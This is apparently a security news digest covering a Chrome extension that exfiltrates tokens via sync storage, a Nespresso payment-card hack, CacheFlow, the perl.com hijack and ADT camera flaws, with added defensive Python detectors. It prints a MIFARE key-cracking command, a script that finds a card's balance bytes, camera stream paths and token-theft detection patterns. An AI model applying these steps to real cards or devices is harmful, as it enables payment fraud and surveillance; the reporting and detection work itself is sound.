Cybercriminals have been using a novel approach to exfiltrate data that involves directly injecting malicious Google Chrome extensions onto victims’ Windows machines via the abuse of Google’s cloud syncing function.
The goal of the recently-identified campaign is to manipulate data in internal web applications that the victims have access to, according to an analysis.
According to Bojan Zdrnja, writing for the SANS Institute, attackers are directly planting malicious extensions on the targets’ computers, rather than uploading them to the Chrome Web Store and waiting for victims to download them.
The malicious add-on is disguised as a “Forcepoint Endpoint Chrome Extension for Windows,” with the attackers using the security company’s logo to enhance an air of legitimacy.
The threat actors “dropped the extension locally in a folder and loaded it directly from Chrome on a compromised workstation,” explained Zdrnja, in an analysis late last week. “This is actually a legitimate function in Chrome – you can access it by going to More Tools -> Extensions and enabling Developer mode, after which you can load any extensions locally, directly from a folder by clicking on ‘Load unpacked.'”
The analysis doesn’t detail how the initial compromise was carried out. However, when it comes to the attack goal, “they actually limited activities on this workstation to those related to web applications, which explains why they dropped only the malicious Chrome extension, and not any other binaries,” the researcher explained. “That being said, it also makes sense – almost everything is managed through a web application today, be it your internal CRM, document management system, access rights management system or something else.”
How to Create a Malicious Google Chrome Extension
For all Chrome extensions, configuration parameters are stored in a file named manifest.json. In the case of the faux Forcepoint extension, three specific malicious functions stood out to Zdrnja.
The authors used a “content_scripts” parameter to define which JavaScript files will be injected into web pages by the extension.
This “can be used by an attacker to add arbitrary code to target web pages (think about changing content and stealing data),” the researcher noted.
Next, a permissions parameter specified that the extension can use the storage API.
And finally, the background parameter specifies JavaScript files that will run when the extension is loaded.
“This is where the attacker had their exfiltration and command-and-control features embedded,” he added. “Background files are extremely powerful and allow a script to receive a message (and send it) in background (as the name says).”
‘Chats’ with Legit Extensions to Steal Data
The authors of the malicious Forcepoint add-on were able to steal information from users’ internal extensions thanks to setting up a behind-the-scenes “chat” between the malicious extension and other web apps.
A function called “chrome.runtime.onConnectExternal.addListener” is provided by the Chrome browser to extensions. As its name suggests, it listens for when a connection to the browser is made from another extension. Meanwhile, a port object called “port.onMessage.addListener” is employed, which allows for two-way communication between the extensions.
The extension then steals credentials – mail and OAuth tokens – from the victim’s machine.
“There is a switch that checks the value of parameter type in the received message,” according to the analysis. “Now an interesting thing happens: if the value of the type parameter is ‘check_oauth_token_status,’ the extension will verify if there is a key called ‘oauth_token’ in Chrome’s storage. If it is there, it will send back (to the other extension) a message containing the value of the token with the status set to true, after which it will be deleted from Chrome’s storage.”
If the value of the type parameter is “save_mailhighlight_token,” the malicious extension will create a new key called “email” in Chrome’s storage.
The extension also uses the “chrome.storage.sync.get” and “chrome.storage.sync.save” methods, so that all these values will be automatically synced to Google’s cloud by Chrome in the context of the user logged in to Chrome. This provides an unusual exfiltration method.
“In order to set, read or delete these keys, all the attacker has to do is log in with the same account to Google, in another Chrome browser (and this can be a throwaway account), and they can communicate with the Chrome browser in the victim’s network by abusing Google’s infrastructure,” Zdrnja explained.
A Novel Type of Cyberattack
Attackers can use this approach for exfiltrating data as well as C2 communications.
“While there are some limitations on size of data and amount of requests, this is actually perfect for C2 commands (which are generally small), or for stealing small, but sensitive data – such as authentication tokens,” according to the researcher. “It will be slow because Chrome and Google throttle requests, allowing us to transfer 4 MB at a time.”
Overall, the attack is unusual and novel, he added: “there were also some things that I saw for the first time, which is why I think this particular exploitation is novel.”
To protect their environments, admins should make sure that Chrome extensions are controlled, according to Zdrnja.
“Google allows you to do that through group policies so you can define exactly which extensions are allowed/approved and block everything else,” he said.
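For triage, the combination to look for in an installed extension is an external-connection listener plus account-synced storage. The following static check is an added example (not code from the original analysis) run over a constructed manifest and background script that only reproduce the API shape described above:

```python
"""Static triage of an unpacked Chrome extension for the pattern described above:
a listener for connections from other extensions combined with chrome.storage.sync,
whose contents Chrome replicates to whichever Google account the browser is signed
in to. Added example, not code from the original analysis; the manifest and
background script below are constructed fixtures."""
import json
import re
from typing import Dict, List

# tag -> (regex over script source, why a reviewer cares)
SCRIPT_INDICATORS = {
    "external_listener": (
        r"chrome\.runtime\.on(Connect|Message)External\.addListener",
        "accepts connections or messages from other extensions",
    ),
    "sync_storage": (
        r"chrome\.storage\.sync\.(set|get|remove)\(",
        "reads or writes account-synced storage",
    ),
    "port_messaging": (
        r"port\.onMessage\.addListener",
        "two-way port messaging with the peer extension",
    ),
    "token_keys": (
        r"['\"](oauth_token|check_oauth_token_status|save_mailhighlight_token)['\"]",
        "storage keys or message types named in the analysis",
    ),
}


def triage(manifest_text: str, scripts: Dict[str, str]) -> Dict[str, object]:
    """Return the indicators found and a verdict.

    'sync-exfil pattern' is reported only when an external listener and synced
    storage occur together: that combination is what turns Google's sync
    infrastructure into a channel to and from the victim's browser."""
    manifest = json.loads(manifest_text)
    hits: List[str] = []
    tags = set()

    if "storage" in manifest.get("permissions", []):
        hits.append("manifest: 'storage' permission (needed for chrome.storage.sync)")
    # Without externally_connectable, any other extension may open a port to this one.
    if "externally_connectable" not in manifest:
        hits.append("manifest: no externally_connectable restriction")

    for filename, body in scripts.items():
        for tag, (pattern, why) in SCRIPT_INDICATORS.items():
            if re.search(pattern, body):
                hits.append(f"{filename}: {why}")
                tags.add(tag)

    if {"external_listener", "sync_storage"} <= tags:
        verdict = "sync-exfil pattern"
    elif tags:
        verdict = "review"
    else:
        verdict = "clean"
    return {"verdict": verdict, "hits": hits}


# Constructed fixture: only the API shape under discussion, not the real extension.
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 2,
    "name": "constructed-sample",
    "version": "0.1",
    "permissions": ["storage"],
    "background": {"scripts": ["background.js"]},
})
SAMPLE_SCRIPTS = {
    "background.js": (
        "chrome.runtime.onConnectExternal.addListener(function (port) {\n"
        "  port.onMessage.addListener(function (msg) {\n"
        "    if (msg.type === 'save_mailhighlight_token') {\n"
        "      chrome.storage.sync.set({email: msg.value});\n"
        "    }\n"
        "  });\n"
        "});\n"
    ),
}
# Constructed benign extension: local storage only, no external listener.
BENIGN_SCRIPTS = {"background.js": "chrome.storage.local.set({theme: 'dark'});\n"}

if __name__ == "__main__":
    for label, scripts in (("sample", SAMPLE_SCRIPTS), ("benign", BENIGN_SCRIPTS)):
        result = triage(SAMPLE_MANIFEST, scripts)
        print(label, "->", result["verdict"])
        for hit in result["hits"]:
            print("   ", hit)
```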
Hacking Nespresso machines to have unlimited funds to purchase coffee
8.2.2021 Hacking Securityaffairs
Some commercial Nespresso machines that are used in Europe could be hacked to add unlimited funds to purchase coffee.
Some Nespresso Pro machines in Europe could be hacked to add unlimited funds to purchase coffee. The attack is possible because the machines use a smart card payment system that leverages insecure technology, the MIFARE Classic smart cards.
The vulnerability was disclosed by the security researcher Polle Vanhoof.
The MIFARE Classic smart card technology has been known to be insecure since 2008, when security researchers from Radboud University Nijmegen reverse-engineered the chip and published their findings.
The experts demonstrated how to clone and manipulate the contents of a MIFARE Classic chip.
The chipmaker NXP Semiconductor tried to stop the publication of the research by requesting a preliminary injunction that was denied.
NXP Semiconductor then recommended that customers use its MIFARE Plus cards, which use AES-128.
Vanhoof’s arsenal included an NFC card reader/writer, nfc-mfclassic (the MIFARE Classic command-line tool) and a version of mfoc, the MIFARE Classic offline cracker, that he modified.
The researcher wrote a Python script that cracked the weak encryption and dumped the card’s binary.
He was thus able to crack the keys and dump the smartcard.
“To start things off, we will want to crack any non-default keys present on the Nespresso card,” wrote the expert. “We can easily do this using the mfoc tool. We run the following command:”
mfoc -P 500 -O nespresso.dmp
“We see in the output below that the card uses default keys for most sectors except the last 4. It takes the tool a couple of minutes to break the remaining 4 keys and they are dumped to our screen.”
Then he was able to manually grab the keys that were found in the data dump.
In the second part of the attack, the expert attempted to find the field associated with the funds while purchasing a coffee. To do this he made different purchases with different amounts of money.
“We are working on the assumption that the value of the card is kept on the card itself rather than on some centralized server. This is a much simpler and cost effective design, requiring less hardware and software to implement, making it a likely choice for anyone developing such a system unaware of the security weaknesses of the MIFARE Classic,” Vanhoof added. “We charge our card with some value.”
Once he had identified the bytes on the card that changed when purchasing a coffee (three bytes), Vanhoof demonstrated that by altering them he could manipulate the amount of money available to pay for coffee. He wrote a value of €167,772.15 to the card using the nfc-mfclassic tool.
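The locating step above (diff dumps taken before and after a purchase of known price) is how anyone assessing a stored-value card scheme can tell whether the balance lives on the card. The script below is an added example, not code from the write-up, and works on two constructed dumps in the nfc-mfclassic 1K layout; the field position and byte order in the fixture are invented, since the page does not give the real card's layout. It also shows why a 3-byte cent counter tops out at exactly the €167,772.15 mentioned above.

```python
"""Find where a MIFARE Classic card keeps its stored value by diffing dumps taken
before and after a purchase of known price, the method described above. Added
example, not code from the write-up; the two dumps are constructed here rather
than read from a card. Assumes the nfc-mfclassic dump layout for a 1K card:
1024 bytes, 16 sectors of 4 blocks of 16 bytes, block 3 of each sector being
the key/access-bits trailer."""
from typing import List, Tuple

BLOCK_SIZE = 16
BLOCKS = 64
Run = Tuple[int, int, int]              # (block, first_offset, last_offset)
Candidate = Tuple[int, int, int, str]   # (block, offset, width, byte order)


def changed_runs(before: bytes, after: bytes) -> List[Run]:
    """Runs of differing bytes, skipping sector trailers and the manufacturer block."""
    assert len(before) == len(after) == BLOCKS * BLOCK_SIZE
    runs: List[Run] = []
    for block in range(1, BLOCKS):
        if block % 4 == 3:          # trailer: keys and access bits, never a balance
            continue
        base = block * BLOCK_SIZE
        start = None
        for off in range(BLOCK_SIZE):
            differs = before[base + off] != after[base + off]
            if differs and start is None:
                start = off
            elif not differs and start is not None:
                runs.append((block, start, off - 1))
                start = None
        if start is not None:
            runs.append((block, start, BLOCK_SIZE - 1))
    return runs


def locate_balance(before: bytes, after: bytes, price_cents: int) -> List[Candidate]:
    """Integer fields that decreased by exactly the purchase price.

    Every 1- to 4-byte window covering a changed run is read in both byte
    orders. A single diff cannot distinguish leading zero bytes from padding,
    so a 2-byte and a 3-byte reading of the same field may both be listed;
    a second purchase that crosses a byte boundary settles the width."""
    found: List[Candidate] = []
    for block, first, last in changed_runs(before, after):
        base = block * BLOCK_SIZE
        for width in range(1, 5):
            lo = max(0, last - width + 1)
            hi = min(first, BLOCK_SIZE - width)
            for off in range(lo, hi + 1):
                for order in ("big", "little"):
                    old = int.from_bytes(before[base + off:base + off + width], order)
                    new = int.from_bytes(after[base + off:base + off + width], order)
                    if old - new == price_cents:
                        found.append((block, off, width, order))
    return found


def max_balance_euro(width_bytes: int = 3) -> float:
    """Largest value a cent counter of this width can hold (3 bytes: 167,772.15)."""
    return (256 ** width_bytes - 1) / 100


def build_dump(balance_cents: int, counter: int) -> bytes:
    """Constructed 1K dump: default FFFFFFFFFFFF keys in every trailer, the balance
    as a 3-byte big-endian cent count at block 8 offset 4, and a one-byte
    transaction counter at block 9 offset 0. This layout is invented for the
    example; the real card's layout is not given on the page."""
    dump = bytearray(BLOCKS * BLOCK_SIZE)
    trailer = bytes.fromhex("ffffffffffff" "ff078069" "ffffffffffff")
    for sector in range(16):
        trailer_block = sector * 4 + 3
        dump[trailer_block * BLOCK_SIZE:(trailer_block + 1) * BLOCK_SIZE] = trailer
    dump[8 * BLOCK_SIZE + 4:8 * BLOCK_SIZE + 7] = balance_cents.to_bytes(3, "big")
    dump[9 * BLOCK_SIZE] = counter
    return bytes(dump)


BEFORE = build_dump(1000, 5)   # EUR 10.00 on the card
AFTER = build_dump(750, 6)     # after buying a EUR 2.50 coffee

if __name__ == "__main__":
    print("changed:", changed_runs(BEFORE, AFTER))
    for cand in locate_balance(BEFORE, AFTER, 250):
        print("balance candidate (block, offset, width, order):", cand)
    print("3-byte cent counter caps at EUR", max_balance_euro())
```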
The expert also provided potential mitigations to secure the payment process such as:
Hardware upgrade: Upgrade the smartcards for future products and use more secure alternatives
Software mitigation: Upgrade the machines to keep the money value on a backend server rather than on the card itself, only using the cards as a “Personal ID”
“After talking to Nespresso, it seems they already offer both of these options. Clients concerned with the security of their systems should look into these alternatives.” concludes the expert.
Below is the disclosure timeline:
24 September 2020: Initial disclosure of findings to Nestlé Nespresso S.A
24 September 2020: The vendor was quick in communicating and setting up a meeting to discuss the vulnerability
09 October 2020: Full disclosure of technical details to vendor
02 February 2021: Nespresso confirmed they agreed with publishing this writeup
Over a Dozen Chrome Extensions Caught Hijacking Google Search Results for Millions
4.2.2021 Hacking Thehackernews
New details have emerged about a vast network of rogue extensions for Chrome and Edge browsers that were found to hijack clicks to links in search results pages to arbitrary URLs, including phishing sites and ads.
Collectively called "CacheFlow" by Avast, the 28 extensions in question — including Video Downloader for Facebook, Vimeo Video Downloader, Instagram Story Downloader, VK Unblock — made use of a sneaky trick to mask their true purpose: leveraging the Cache-Control HTTP header as a covert channel to retrieve commands from an attacker-controlled server.
All the backdoored browser add-ons have been taken down by Google and Microsoft as of December 18, 2020, to prevent more users from downloading them from the official stores.
According to telemetry data gathered by the firm, the top three infected countries were Brazil, Ukraine, and France, followed by Argentina, Spain, Russia, and the U.S.
The CacheFlow sequence began when unsuspecting users downloaded one of the extensions in their browsers that, upon installation, sent out analytics requests resembling Google Analytics to a remote server, which then beamed back a specially-crafted Cache-Control header containing hidden commands to fetch a second-stage payload that functioned as a downloader for the final JavaScript payload.
This JavaScript malware amassed birth dates, email addresses, geolocation, and device activity, with a specific focus on collecting the data from Google.
"To retrieve the birthday, CacheFlow made an XHR request to https://myaccount.google.com/birthday and parsed out the birth date from the response," Avast researchers Jan Vojtěšek and Jan Rubín observed.
In the final step, the payload injected another piece of JavaScript into each tab, using it to hijack clicks leading to legitimate websites, as well as modify search results from Google, Bing, or Yahoo to reroute the victim to a different URL.
That's not all. The extensions not only avoided infecting users who were likely to be web developers — something that was deduced by computing a weighted score of the extensions installed or by checking if they accessed locally-hosted websites (e.g., .dev, .local, or .localhost) — they were also configured to not exhibit any suspicious behavior during the first three days post-installation.
Avast said the myriad tricks employed by the malware authors to escape detection may have been a crucial factor that allowed it to execute malicious code in the background and stealthily infect millions of victims, with evidence suggesting that the campaign may have been active since at least October 2017.
"We usually trust that the extensions installed from official browser stores are safe," the researchers said. "But that is not always the case as we recently found."
"CacheFlow was notable in particular for the way that the malicious extensions would try to hide their command and control traffic in a covert channel using the Cache-Control HTTP header of their analytics requests. We believe this is a new technique."
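A Cache-Control value is a short list of well-defined directives, so anything else in that header is worth a second look. The following detector is an added example (not Avast's code) that checks each directive of a response header against the registered names and flags unknown directives, non-numeric ages and values that look like an encoded blob; the header values and JSON-lines log records it runs over are constructed.

```python
"""Flag Cache-Control response headers that carry something other than caching
directives, the covert channel CacheFlow used to receive commands. Added example,
not Avast's code; the header values and log lines below are constructed.
Directive names are checked against those defined for responses in RFC 9111,
RFC 8246 and RFC 5861."""
import json
import math
import re
from typing import Dict, List

KNOWN = {
    "max-age", "s-maxage", "no-cache", "no-store", "no-transform",
    "must-revalidate", "proxy-revalidate", "public", "private", "immutable",
    "must-understand", "stale-while-revalidate", "stale-if-error",
}
NUMERIC = {"max-age", "s-maxage", "stale-while-revalidate", "stale-if-error"}
FIELD_LIST = {"no-cache", "private"}   # may name response fields, e.g. no-cache="Set-Cookie"
TOKEN = r"[!#$%&'*+.^_`|~0-9A-Za-z-]+"
TOKEN_RE = re.compile(TOKEN)
FIELD_LIST_RE = re.compile(rf"{TOKEN}(\s*,\s*{TOKEN})*")
MIN_BLOB_LEN, MIN_BLOB_ENTROPY = 20, 3.5


def split_directives(value: str) -> List[str]:
    """Split on commas that are outside quoted strings."""
    parts, buf, quoted = [], [], False
    for ch in value:
        if ch == '"':
            quoted = not quoted
        if ch == "," and not quoted:
            parts.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
    parts.append("".join(buf))
    return [p.strip() for p in parts if p.strip()]


def shannon_entropy(text: str) -> float:
    """Bits per character; base64/hex blobs score far above plain directive values."""
    n = len(text)
    if n == 0:
        return 0.0
    counts = [text.count(ch) for ch in set(text)]
    return -sum(c / n * math.log2(c / n) for c in counts)


def analyse_cache_control(value: str) -> List[str]:
    """Reasons this header value does not look like plain caching directives."""
    reasons = []
    for part in split_directives(value):
        name, _, arg = part.partition("=")
        name = name.strip().lower()
        arg = arg.strip().strip('"')
        if not TOKEN_RE.fullmatch(name):
            reasons.append(f"malformed directive {name!r}")
        elif name not in KNOWN:
            reasons.append(f"unknown directive {name!r}")
            if len(arg) >= MIN_BLOB_LEN and shannon_entropy(arg) >= MIN_BLOB_ENTROPY:
                reasons.append(f"possible encoded payload in {name!r}")
        elif name in NUMERIC:
            if not arg.isdigit():
                reasons.append(f"{name} carries a non-numeric value")
        elif name in FIELD_LIST:
            if arg and not FIELD_LIST_RE.fullmatch(arg):
                reasons.append(f"{name} carries something other than field names")
        elif arg:
            reasons.append(f"{name} should not carry a value")
    return reasons


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Run the check over JSON-lines proxy records of the (constructed) form
    {"host": ..., "path": ..., "cache_control": ...}."""
    flagged = []
    for line in lines:
        rec = json.loads(line)
        reasons = analyse_cache_control(rec.get("cache_control", ""))
        if reasons:
            flagged.append({"host": rec["host"], "path": rec["path"], "reasons": reasons})
    return flagged


# Constructed records: two ordinary responses and two carrying non-directive data.
SAMPLE_LOG = [
    '{"host": "www.google-analytics.com", "path": "/collect", "cache_control": "no-cache, no-store, must-revalidate"}',
    '{"host": "cdn.example.invalid", "path": "/app.js", "cache_control": "public, max-age=31536000, immutable"}',
    '{"host": "stats.example.invalid", "path": "/collect", "cache_control": "max-age=3600, x-ga=aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvc3RhZ2UyLmpz"}',
    '{"host": "stats.example.invalid", "path": "/collect", "cache_control": "max-age=WzEsMiwzXQ=="}',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["host"], hit["path"], "->", "; ".join(hit["reasons"]))
```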
Domain for programming website Perl.com hijacked
30.1.2021 Hacking Securityaffairs
Threat actors took over the domain name perl.com and pointed it to an IP address associated with malware campaigns.
Attackers have taken over the official domain name of The Perl Foundation perl.com and pointed it to an IP address associated with malware campaigns. Users are recommended to avoid visiting the domain.
The domain Perl.com was created in 1994 and was the official website for the Perl programming language, it is registered with the registrar key-systems(.)net.
“The perl.com domain was hijacked this morning, and is currently pointing to a parking site. Work is ongoing to attempt to recover it.” reads the announcement published on the Perl NOC.
“We encourage you NOT to visit the domain, as there are some signals that it may be related to sites that have distributed malware in the past.”
The attackers changed the IP address from 151.101.2.132 to 35.186.238[.]10.
After the hackers took over the site, it displayed a blank page whose HTML contained GoDaddy parked-domain scripts.
Shortly after the domain hijacking, perl.com was offered for sale for $190k on afternic.com.
Users should avoid using perl.com as a CPAN mirror and can update their mirror in CPAN.pm with the command o conf urllist http://www.cpan.org/, as in the following session:
# perl -MCPAN -eshell
cpan shell -- CPAN exploration and modules installation (v2.20)
Enter 'h' for help.
cpan[1]> o conf urllist http://www.cpan.org/
Please use 'o conf commit' to make the config permanent!
cpan[2]> o conf commit
commit: wrote '/root/.cpan/CPAN/MyConfig.pm'
The IP address 35.186.238[.]101 was associated with a domain employed in malware campaigns, including the distribution of Locky ransomware.
Stack Overflow Shares Technical Details on 2019 Hack
29.1.2021 Hacking Securityweek
Stack Overflow, the popular Q&A platform for programmers, this week shared technical information on how its systems were breached back in 2019, and it turns out that the hacker often viewed questions posted on Stack Overflow to learn how to conduct various activities on the compromised systems.
The security breach was disclosed by Stack Overflow in mid-May 2019, and a few days later it admitted that the incident resulted in the details of some users being exposed.
Stack Overflow has now published a detailed timeline of the attack, which appears to have started on April 30, 2019, and was discovered nearly two weeks later, on May 12, after a suspicious user account that had escalated privileges was noticed by the community.
The company said the attacker had managed to gain access to the personal information of 184 users — it initially said 250 users were impacted — including names, email addresses and IP addresses. There was no indication that the hacker’s goal was to obtain user information.
However, more importantly, the attacker gained access to source code, which they managed to exfiltrate. The attacker apparently started from a low-privileged account and gradually worked their way up to the point where they could steal Stack Overflow source code.
“Thankfully, none of the databases—neither public (read: Stack Exchange content) nor private (Teams, Talent, or Enterprise)—were exfiltrated. Additionally, there has been no evidence of any direct access to our internal network infrastructure, and at no time did the attacker ever have access to data in Teams, Talent, or Enterprise products,” Stack Overflow said in its blog post.
The attacker regularly viewed questions posted on Stack Overflow to obtain information, which allowed the company to “anticipate and understand the attacker’s methodology” during its investigation.
Stack Overflow says it cannot share any information about the attacker due to ongoing investigations, but the company’s description of the attack suggests that the hacker was skilled and determined.
In addition to a detailed description of the attacker’s actions, Stack Overflow’s blog post also provides information on the remediation steps taken by the company in response to the attack, as well as advice for other organizations to help them prevent these types of incidents.
ADT Security Camera Flaws Open Homes to Eavesdropping
28.1.2021 Hacking Threatpost
Researchers publicly disclosed flaws in ADT’s LifeShield DIY HD Video Doorbell, which could have allowed local attackers to access credentials, video feeds and more.
UPDATE
Researchers have publicly disclosed security flaws found in ADT-owned LifeShield security cameras, which, if exploited, could have allowed a local attacker to eavesdrop on victims’ conversations or tap into a live video feed.
The LifeShield brand is owned by security giant ADT. Specifically affected is the LifeShield DIY HD Video Doorbell, which connects to users’ Wi-Fi networks and lets them answer the door remotely using the LifeShield mobile app.
Researchers contacted ADT before publicly disclosing the flaws, and ADT has deployed patches to all impacted devices. However, security experts warn that ADT’s glitches serve as a warning: ADT is just the latest camera maker to patch security issues of this kind in connected cameras.
“Gaps in this fragile ecosystem can have unforeseen consequences and might even turn devices that protect our privacy into tools that violate it,” said researchers with Bitdefender on Wednesday.
According to ADT, 1,500 devices were affected by the flaw. These devices were part of a single model of LifeShield doorbell camera, which was marketed and sold as a residential device, and is no longer currently sold. According to ADT, its current line of DIY hardware, under the “Blue by ADT” brand, is completely new hardware and is not affected by the flaw.
What Are the Flaws
Researchers outlined several issues in the security cameras. Firstly, local attackers (i.e., connected to the same Wi-Fi network) could view credentials from the cloud for each device. The camera is identified by the cloud via its MAC address, and is then authenticated. However, after the device is set up and a password is created, the server would respond to requests that contained the wrong credentials, said researchers. Moreover, it actually responded with the last-known credentials – which could have allowed an attacker to obtain the administrator password of the camera by simply knowing its MAC address.
Finding a device’s MAC address is “not difficult at all,” Bogdan Botezatu, director of threat research and reporting for Bitdefender, told Threatpost. “Networked devices broadcast their MAC Address freely on the same LAN,” he said.
In order to exploit the flaw, “an attacker would only need to be connected to the same network as the wireless camera,” Botezatu told Threatpost. Attackers could then use a packet sniffer to scope out the requests between the camera and the server, Botezatu said: “Any packet sniffer would work. Wireshark and TCPdump would be the go-to tools in any hacker’s arsenal,” he said.
“This way, they would be able to intercept the camera communication that also contains the administrator password encoded in base64,” said Botezatu. “Once these credentials are obtained, the attacker can control the camera for as long as they share the same network (the camera’s web interface is only available on the same network).”
ADT-owned doorbell camera. Credit: ADT
Secondly, local attackers were able to gain unrestricted real-time streaming protocol (RTSP) access to the video feed. RTSP is a network control protocol utilized by communication systems to control streaming media servers.
After gaining credentials via the device MAC address, attackers could have easily accessed the interface. This would have given them unauthenticated access to the RTSP server – allowing them to access both video and audio of the camera’s streaming live feed.
Finally, after gaining administrative credentials and accessing the interface, there was an endpoint vulnerable to command injection which can be exploited to gain root access, said researchers. Stemming from unsanitized input, this flaw (CVE-2020-8101) allows local attackers to inject authenticated commands.
“The attacker gains control to the audio and video feed even in the absence of credentials, as vulnerable versions of firmware used to expose RTSP feeds on the network at rtsp://[ip-address]:554/img/media.sav,” Botezatu told Threatpost.
Disclosure to ADT
Researchers first contacted the vendor on Feb. 6 last year, and did not hear back until Aug. 3. On Aug. 17, an automatic update was released to fix the issue. Fast forward to this Wednesday, researchers finally publicly disclosed the vulnerability.
“We worked with Bitdefender to identify and quickly patch the vulnerabilities its researchers privately brought to our attention,” an ADT spokesperson told Threatpost. “All the affected doorbell cameras have been patched.”
Researchers meanwhile said that ADT “was quick to address the issues once contact was established.”
“Patches were applied to the production servers and all 1,500 affected devices within 2 weeks of being notified of the vulnerabilities,” they said.
In-Security Cameras
Various vulnerabilities continue to plague security cameras. In March 2020, Taiwan-based LILIN warned that attackers were exploiting multiple zero-day flaws in its CCTV security cameras in order to add them to various botnets. And in October 2020, Cisco issued patches for high-severity vulnerabilities plaguing its popular video surveillance IP cameras, which could allow an unauthenticated, adjacent attacker to execute arbitrary code.
However, the sensitive footage and audio that these devices collect also make them prime targets for disturbing attacks that intrude on customers’ privacy.
Last week, former ADT employee Telesforo Aviles pleaded guilty to accessing customers’ security camera footage in order to spy on their most private moments, according to the U.S. Attorneys’ Office.
Threatpost has reached out to ADT for further comment on this latest flaw.
Updated on Jan. 27 at 3pm ET: A previous version of this article quoted a market share percentage for ADT; this percentage does not encompass ADT’s DIY security products and DIY internet-connected security cameras.
Warning Issued Over Hackable ADT's LifeShield Home Security Cameras
28.1.2021 Hacking Thehackernews
Newly discovered security vulnerabilities in ADT's Blue (formerly LifeShield) home security cameras could have been exploited to hijack both audio and video streams.
The vulnerabilities (tracked as CVE-2020-8101) were identified in the video doorbell camera by Bitdefender researchers in February 2020 before they were eventually addressed on August 17, 2020.
LifeShield was acquired by Florida-based ADT Inc. in 2019, with Lifeshield's DIY home security solutions rebranded as Blue as of January 2020. The company's products had a 33.6% market share in the U.S. last year.
The security issues in the doorbell camera allow an attacker to
Obtain the administrator password of the camera by simply knowing its MAC address, which is used to identify a device uniquely
Inject commands locally to gain root access, and
Access audio and video feeds using an unprotected RTSP (Real-Time Streaming Protocol) server
The doorbell is designed to periodically send heartbeat messages to "cms.lifeshield.com," containing information such as the MAC address, SSID, local IP address, and the wireless signal strength. The server, in return, responds with an authentication message that can be trivially bypassed by crafting a fake request by using the device's MAC address.
"The server seems to ignore the token and checks only the MAC address when sending a response," the researchers noted, adding "the password for the administrator can be obtained by decoding the base64 authorization header received in this request."
Armed with this admin access to the camera's web interface, the attacker can leverage an HTTP interface that's vulnerable to command injection and obtain root access.
Lastly, the researchers also found that an unsecured RTSP server sans any credentials could be exploited to access the video stream at "rtsp://10.0.0.108:554/img/media.sav" using any media player such as VLC.
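The heartbeat flaw described in both ADT articles above comes down to one server-side decision: identify the device by MAC, ignore the token, and echo the last-known credentials. The following is an added example (not ADT's or Bitdefender's code) that puts that handler next to a hardened one and shows that base64 on the Authorization header is encoding, not protection; the message layout, device records and secrets are constructed.

```python
"""The heartbeat exchange described in the two ADT articles above, as an added
example (not ADT's or Bitdefender's code): a server that identifies the device
by MAC and ignores its token hands the administrator password to anyone who can
forge a heartbeat, and base64 is not a protection. The hardened version checks
the device token with a constant-time compare and never echoes credentials.
Message layout, device records and secrets are constructed for illustration."""
import base64
import hmac
import secrets
from typing import Dict, Tuple

Response = Tuple[int, Dict[str, str]]

# Constructed device registry keyed by MAC, as the articles say the server does.
DEVICES = {
    "00:11:22:33:44:55": {"admin_password": "constructed-admin-pw",
                          "token": secrets.token_hex(16)},
}


def vulnerable_heartbeat(msg: Dict[str, str]) -> Response:
    """Looks up the device by MAC only and replies with the last-known credentials."""
    dev = DEVICES.get(msg.get("mac", ""))
    if dev is None:
        return 404, {}
    basic = base64.b64encode(f"admin:{dev['admin_password']}".encode()).decode()
    return 200, {"Authorization": "Basic " + basic}


def hardened_heartbeat(msg: Dict[str, str]) -> Response:
    """Requires the per-device token and returns only an acknowledgement."""
    dev = DEVICES.get(msg.get("mac", ""))
    presented = msg.get("token", "").encode()
    if dev is None or not hmac.compare_digest(presented, dev["token"].encode()):
        return 401, {}
    return 200, {"status": "ok"}   # the password never leaves the server


def decode_basic(header: str) -> str:
    """What anyone reading the LAN traffic can do with a Basic header."""
    scheme, _, blob = header.partition(" ")
    if scheme != "Basic":
        raise ValueError("not a Basic header")
    _user, _, password = base64.b64decode(blob).decode().partition(":")
    return password


# A forged heartbeat: correct MAC (visible on the LAN), made-up token.
FORGED = {"mac": "00:11:22:33:44:55", "token": "not-the-real-token",
          "ssid": "HomeWiFi", "ip": "10.0.0.108"}


def demo() -> Dict[str, bool]:
    """Compare the two handlers on the forged and on a genuine heartbeat."""
    v_status, v_headers = vulnerable_heartbeat(FORGED)
    h_status, _ = hardened_heartbeat(FORGED)
    genuine = dict(FORGED, token=DEVICES[FORGED["mac"]]["token"])
    g_status, g_headers = hardened_heartbeat(genuine)
    leaked = v_status == 200 and decode_basic(v_headers["Authorization"])
    return {
        "vulnerable_leaks": leaked == DEVICES[FORGED["mac"]]["admin_password"],
        "hardened_rejects_forgery": h_status == 401,
        "hardened_accepts_genuine": g_status == 200 and "Authorization" not in g_headers,
    }


if __name__ == "__main__":
    for check, outcome in demo().items():
        print(f"{check}: {outcome}")
```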
While patches have been applied to the production servers and all the 1,500 affected devices, with no easy way to confirm if the camera users installed the firmware updates, Bitdefender chose to delay public disclosure by more than five months.
"Customers have security choices when it comes to securing their smart homes or small businesses," the researchers said.
"Carefully researching IoT vendors for security update policies to their products, changing default passwords, separating IoTs into different subnetworks, and even regularly checking for firmware updates are only a handful of practical and hands-on security tips that anyone can adhere to."
Fidelis, Mimecast, Palo Alto Networks, Qualys also impacted by SolarWinds hack
27.1.2021 Hacking Securityaffairs
Security vendors Fidelis, Mimecast, Palo Alto Networks, and Qualys revealed that they were also impacted by the SolarWinds supply chain attack.
The SolarWinds supply chain attack is worse than initially thought: other security providers have confirmed that they were also impacted. Mimecast, Palo Alto Networks, Qualys, and Fidelis confirmed that they had installed tainted updates of the SolarWinds Orion app.
Mimecast was the first of these security providers to disclose a major security breach: it revealed that threat actors compromised its internal network and leveraged digital certificates used by one of its products to access the Microsoft 365 accounts of some of its customers.
“Microsoft recently informed us that a Mimecast-issued certificate provided to certain customers to authenticate Mimecast Sync and Recover, Continuity Monitor, and IEP products to Microsoft 365 Exchange Web Services has been compromised by a sophisticated threat actor.” reads the announcement published by Mimecast.
“Approximately 10 percent of our customers use this connection. Of those that do, there are indications that a low single digit number of our customers’ M365 tenants were targeted.”
Today, Mimecast published a new update to confirm that the incident was linked to the SolarWinds supply chain attack that resulted in the installation of tainted SolarWinds updates on its systems.
